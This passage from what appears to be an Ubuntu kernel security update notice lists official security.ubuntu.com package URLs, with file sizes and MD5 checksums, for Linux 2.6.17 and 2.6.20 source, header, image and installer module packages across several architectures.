http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:    51820 0b5fce077f8d2e5970c2679236dc3dd7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/usb-storage-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:    38420 8f97a23ee87c907479cb19e471916005\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.17/xfs-modules-2.6.17-12-sparc64-di_2.6.17.1-12.41_sparc.udeb\n      Size/MD5:   283100 60d3a89b47183f645b78b5d1107c7b5b\n\nUpdated packages for Ubuntu 7.04:\n\n  Source archives:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.32.diff.gz\n      Size/MD5:  1565964 dbaf53a99adc1e8785da9cbb150801e7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.32.dsc\n      Size/MD5:     2472 47dfc615dfa2e15eb5094617bcb4767e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20.orig.tar.gz\n      Size/MD5: 62174876 f19203b2488d943a640abe8f3cd20f57\n\n  Architecture independent packages:\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-doc-2.6.20_2.6.20-16.32_all.deb\n      Size/MD5:  4877398 8cfc2d5cbdd951ffd2fa434843b4bf36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-kernel-devel_2.6.20-16.32_all.deb\n      Size/MD5:    85092 ccf3b4417e99e717fa7839c1de6b3f87\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-source-2.6.20_2.6.20-16.32_all.deb\n      Size/MD5: 47820380 fd6f9228289f46c0d337f3ad59fe15ab\n\n  amd64 architecture (Athlon64, Opteron, EM64T Xeon):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    24492 7bbb6a157c8b4b5f0910a867d8fb6b19\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   202074 eb887321018340c061e7291a6f62be38\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    39344 4ca53051f5f5ae6de5839ce1297207f2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    50908 7edbd05d91a90394fc4c2ca0cdfc7c22\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   187504 117c8ddfc16ac2313b2408d501c8f434\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    34906 a38df2ab16b4f13086ea0591f8d35438\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   644406 6e33794af6da6f574a383552e9e897d0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   174680 7a67c1e442d86bd89fa584f2430623e5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    76422 a2687f1428a494398be728161f3d6470\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    57878 12916742f585fc6f8b92cd6dd94e1fd4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   140012 848ec2c29a62a88e6c2b07d3b4a20d11\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   277482 86a3e8c6c1c3f262f6cc28cbfa15ea56\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:  1905402 21e71ab6b1fd523eb0be4f2290aab63c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.32_amd64.deb\n      Size/MD5:   858156 803a187c28bb8f0b0e87872596894a8e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.32_amd64.deb\n      Size/MD5:   857582 cbea9bf84d33e965b202698b05fd35a9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.32_amd64.deb\n      Size/MD5:   858634 279d7a23a1bea89f671844c1a9338dc3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_amd64.deb\n      Size/MD5:  8128562 3cf69848ebf0efd00057fcb628cc72cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.32_amd64.deb\n      Size/MD5: 23066252 d7aa6e43692796eeee8e6cee541d776d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.32_amd64.deb\n      Size/MD5: 23386118 33278d4604a35062b689ff3d1b89927c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.32_amd64.deb\n      Size/MD5: 18427560 e2ce91d927c1b0737b3e79b84291a98a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.32_amd64.deb\n      Size/MD5: 18698840 07697da5633e9aeb66600032f3fdef50\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_amd64.deb\n      Size/MD5:   668162 5096377aa743b1299c83a69a027a31d9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   246422 9238f0a5fc821f1cde73599ffeed8afb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   144474 51dbc7175f5c04d71fd6fa79c8eaa9c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   225008 ee36fa3988d06a4510419ef134ef27a5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:  1110528 985a54edb8e59a6a5d36e2b9b138208f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:  1754792 6ef2cf009aea3522917bbd5250eac7f6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   140920 210137898aae8a150ef6ce211f90a1f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   163304 dde7038b80a04c02221f0a15dafaa665\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   265728 afccb6d244a7c26d2ed2bff9520f38de\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    34298 0e74159dd141ee3410b5700c9f0f7214\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    38432 56b4cccf93a57620bde9c698ffd4bb81\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    67680 a1ff1f4b49b1dcc51742e022ad43ec98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    20962 318f28a79d4cc3879fc915913da1a791\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:     8326 225dd627cf090ced60263d8bd1c157a1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    54580 c8eb2608c5ba1d36140fa09b5301cc7c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    86014 c1e8d3e3747a03e309dcd5ad2a5442c9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   322570 09da047475c27276a278e2f014d8be2c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:  1046844 3cb54d1dcb9ae126ab50f0da417122da\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    43976 ea4b2eba2374c3bb7f59d6b624fb3ca1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    12010 4c633de1d761b119b8b7aeeee0d632fe\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/speakup-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    61916 dc0c694f628844c4cdb0bbfd58b92634\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/storage-core-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:   377816 8c30f011d1a85e548ee4f14d3f4b4bf0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/usb-modules-2.6.20-16-generic-di_2.6.20-16.32_amd64.udeb\n      Size/MD5:    66658 1158b7ea9fd8272d28b1493fcb0fd3bc\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-2.6.20-16-lowlatency_2.6.20-16.32_amd64.deb\n      Size/MD5: 23126252 3dbec8c2327684063ed3cf0996cf924b\n    http://security.ubuntu.com/ubuntu/pool/universe/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-lowlatency_2.6.20-16.32_amd64.deb\n      Size/MD5: 18477824 4db252af56f0ddc6f0a51d039b5ab619\n\n  i386 architecture (x86 compatible Intel/AMD):\n\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    20322 d365c3e10f4dfc63c6eabc65bfc2bfee\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/acpi-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    22882 825d0dfb3dc1decfe5e772e4b101741a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   210062 703b0167f46257bb7d03e3ac8b2f57b6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/block-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   212238 3a430d2e16e4efbfcb5cb07057de3427\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    88694 3c772a6afacefa3e2242e1725c7755ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/cdrom-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    35620 0a08fcd1eb13e70336432c9fe15dacd9\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    37730 f5fc6240e18a5ab52c82446542238542\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fat-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    38408 2151d52af0c5fbb1963a1e0dd5259718\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    45648 c5494d90e1044f4177f9861a19ba8ee6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fb-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    45798 3b6efbffcc4bbb6a3a85c85c035cb249\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   179464 7ba01975cd4942eeab584d254e315ed0\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/firewire-core-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   179828 1e218336e370b59d65daa3efea59f0ab\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    32104 f8c0cd231b3317e4860c93ab69925d68\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/floppy-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    32422 47ce242a541ba8f849249e5142983f5d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   648630 f04cecba184c2d2ce738c618b4c01bde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-core-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   667440 6fe6412fd426d10ce19d40259af5e96b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   178190 87051c9f16a48f23d46fabd85b08ce73\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/fs-secondary-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   181278 d047391967cb49e328fed780e57bb131\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    72396 aaa00e702843506a6a1232e14cc9723d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ide-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    74048 868e57d20d938d1e4295920dad2f2d26\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    53574 bff8e81c4cbf823e8ac40f54644e8328\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/input-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    54778 d641c63917264624cab13ca6121e3e12\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   129180 7fb84c6ae57ac34db3e8614c236f8ea2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ipv6-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   134868 148faa30df1b06cfcf00b489d357df98\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   275936 aa540d240f1932d7bc31085911bff171\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/irda-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   274972 97c1518f800ea8ffd8fef3277ddb2be2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:  1815890 d3b84df947822d17372230252ecdca36\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/kernel-image-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:  1886620 c35948bf361eb4f70588fdfb89743a8f\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-386_2.6.20-16.32_i386.deb\n      Size/MD5:   837592 37c22ab4e3da16f84acfe108e91bba1b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-generic_2.6.20-16.32_i386.deb\n      Size/MD5:   846982 128a98cd7b25b6448a822c06733f44ff\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-lowlatency_2.6.20-16.32_i386.deb\n      Size/MD5:   839978 359139ad3c28bc9e821d7cb4298092fa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server-bigiron_2.6.20-16.32_i386.deb\n      Size/MD5:   850478 028df4a5999f31bbe75166030e109385\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16-server_2.6.20-16.32_i386.deb\n      Size/MD5:   844198 5ed1d000a16184bcc838320c52834c13\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-headers-2.6.20-16_2.6.20-16.32_i386.deb\n      Size/MD5:  8118566 0cb9ce07946491c856d8073d852a05c2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-386_2.6.20-16.32_i386.deb\n      Size/MD5: 23747504 8ce233852054ca216613e3f3a3e57953\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-generic_2.6.20-16.32_i386.deb\n      Size/MD5: 23812978 c2124313521e2022d56176f9ce8198c3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server-bigiron_2.6.20-16.32_i386.deb\n      Size/MD5: 24375930 40515fc20df8c8bbbe181055eeba2bde\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-2.6.20-16-server_2.6.20-16.32_i386.deb\n      Size/MD5: 23867064 acb627f444f36613b31e178c557eb8c7\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-386_2.6.20-16.32_i386.deb\n      Size/MD5: 23587938 1a3899186b5d2871019c0f64ca8fe59d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-generic_2.6.20-16.32_i386.deb\n      Size/MD5: 24166626 e97ecd27cd0d9ae2cb2da7c4bcd6e1cc\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server-bigiron_2.6.20-16.32_i386.deb\n      Size/MD5: 25657964 a39cac61a38de189485d7785a913a7f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-image-debug-2.6.20-16-server_2.6.20-16.32_i386.deb\n      Size/MD5: 24393184 29691b8a38ea72855b071604a6032ad2\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/linux-libc-dev_2.6.20-16.32_i386.deb\n      Size/MD5:   668152 83fbf6c9c8f182c59bc2a7c71386814e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   244602 de260651df7c2173aec60c0c15f34e31\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/md-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   250128 371613968e9263d3a7634f322865c52d\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   132548 fd7416715256a4614409204b46e6a703\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/message-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   133082 d36eea857c71b7576708ee17ec660cdb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   213186 543213b501e2aff2a9d7ba6300ddb84c\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nfs-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   220602 59628ce38ad96149822299157c7a8ee5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:  1110416 1ee57583e74115c9350866c55ade02cd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-firmware-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:  1110528 2dd987e43dd8b95fa011fa4284b3a8ed\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:  1951366 df5c47c9222ef066bf97e7c89f60f5c5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:  1974714 ff29ac6547e01d926c4b253438136a9b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   149852 802f9dc122ac0cebfc94ca7db42db0f1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   142492 03700387d2f82059ce5c630b341be02e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   160732 229129daccdaf81f943f880214bf0db3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-shared-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   161932 cf99ec9275a2a2156f5197c2fa7b5af6\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   252946 65cb9bd7d36fbd3cb7258132661d764b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/nic-usb-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   255518 a8c85001852c15fe6f3eaee18b56bbf3\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    32766 ef56dd680bc61a0315023ed09b8aba48\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/parport-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    33332 58486f96da6a354b93945c13e18afdcb\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    38030 d65208a35c4e2c472eb4fefd3bdb9008\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pata-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    38304 cbaf30961ee6a6ae8e52507b143417ca\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    81852 a33e5995ce0e1f20a819ae29ae3a68fa\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    82096 701a0b59664e1534ddfeacd7787db751\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    47688 3b6901e7171cf7f17dad65afa59b2387\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/pcmcia-storage-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    47718 d9f07f4ffd9e4e03f97903a2198bf312\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:     8262 211358ff43ea8eec720b7460954d3a7e\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/plip-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:     8496 a901401a2e56fe5e9ec176a169b151c1\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    49952 071653c73617ee0d792580ba747542f5\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/ppp-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    51874 7407c57c679818222a11de597e3b97dd\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    78852 6f03fb2d4a771787c0ce05a9dee9a78b\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/sata-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    79490 3b6d974c4b6ccd4abb061dead43228ce\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   322546 576d6158962ed22020003212b1d69a4a\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-firmware-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:   322574 19f5305bac2241bb943c3a311cfd8949\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:  1362506 4136e388409afe1fac07a65e4a905e63\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/scsi-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:  1347998 8bb5f119264dd8404139c68728620400\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    42454 dd3928fd69ec2600ce72262609e62bf4\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/serial-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    42226 e9961b87ef9e7836579fb98a8b012036\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-386-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    10766 79f43b46f2a5964212615df4278cb671\n    http://security.ubuntu.com/ubuntu/pool/main/l/linux-source-2.6.20/socket-modules-2.6.20-16-generic-di_2.6.20-16.32_i386.udeb\n      Size/MD5:    11398 13c023efde5699988a660edf1bc4effe\n    